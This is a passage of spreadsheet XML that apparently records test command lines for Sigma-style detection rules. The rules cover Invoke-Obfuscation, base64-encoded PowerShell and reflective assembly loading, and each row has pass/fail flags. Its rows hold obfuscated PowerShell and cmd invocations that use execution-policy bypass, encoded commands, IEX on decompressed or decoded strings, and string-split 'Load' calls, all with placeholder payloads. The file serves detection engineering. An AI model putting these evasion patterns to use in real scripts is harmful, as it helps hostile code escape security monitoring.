      <c r="A36" s="43" t="n"/>
      <c r="B36" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C36" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D36" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E36" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="36" t="n"/>
      <c r="J36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="n"/>
      <c r="B37" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C37" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D37" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E37" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="36" t="n"/>
      <c r="J37" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K37" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="n"/>
      <c r="B38" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C38" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D38" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E38" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C39" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D39" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E39" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C40" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D40" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E40" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -COMmanD "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C41" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D41" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E41" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C42" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D42" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E42" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C43" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D43" s="36" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E43" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PAYLOAD=Write-Host 'Benign Educational Bypass' &amp; set LAUNCH=powershell.exe -NoP -c \"{1}{0}\" -f 'st','Te' &amp; %LAUNCH%"</t>
        </is>
      </c>
      <c r="F43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="36" t="n"/>
      <c r="J43" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K43" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="n"/>
      <c r="B44" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C44" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D44" s="36" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E44" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set VAR=Invoke-Expression 'Write-Host Safe' &amp;&amp;set RUN=powershell.exe -c ('Te'+'st') &amp;&amp; %RUN%"</t>
        </is>
      </c>
      <c r="F44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="36" t="n"/>
      <c r="J44" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K44" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="n"/>
      <c r="B45" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C45" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D45" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E45" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F45" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G45" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H45" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I45" s="36" t="n"/>
      <c r="J45" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="n"/>
      <c r="B46" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C46" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D46" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E46" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="n"/>
      <c r="B47" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C47" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D47" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E47" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCutIoNPoLicY Bypass /"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="n"/>
      <c r="B48" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C48" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D48" s="36" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E48" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"e" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="43" t="n"/>
      <c r="B49" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C49" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D49" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E49" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="n"/>
      <c r="B50" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C50" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D50" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E50" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="n"/>
      <c r="B51" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C51" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D51" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E51" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="43" t="n"/>
      <c r="B52" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C52" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D52" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E52" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encOdEDCommAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="43" t="n"/>
      <c r="J52" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="n"/>
      <c r="B53" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C53" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D53" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E53" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENCodEdCOmMand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="n"/>
      <c r="B54" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C54" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D54" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E54" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EnCoDEDCoMMAND WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="n"/>
      <c r="B55" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C55" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D55" s="36" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E55" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encodedcoMmaNd WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C56" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D56" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E56" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="n"/>
      <c r="B57" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C57" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D57" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E57" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="43" t="n"/>
      <c r="J57" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="n"/>
      <c r="B58" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C58" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D58" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E58" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="n"/>
      <c r="B59" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C59" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D59" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E59" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::(\"{1}{0}\" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="43" t="n"/>
      <c r="B60" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C60" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D60" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E60" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="n"/>
      <c r="B61" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C61" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D61" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E61" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="n"/>
      <c r="B62" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C62" s="36" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D62" s="36" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
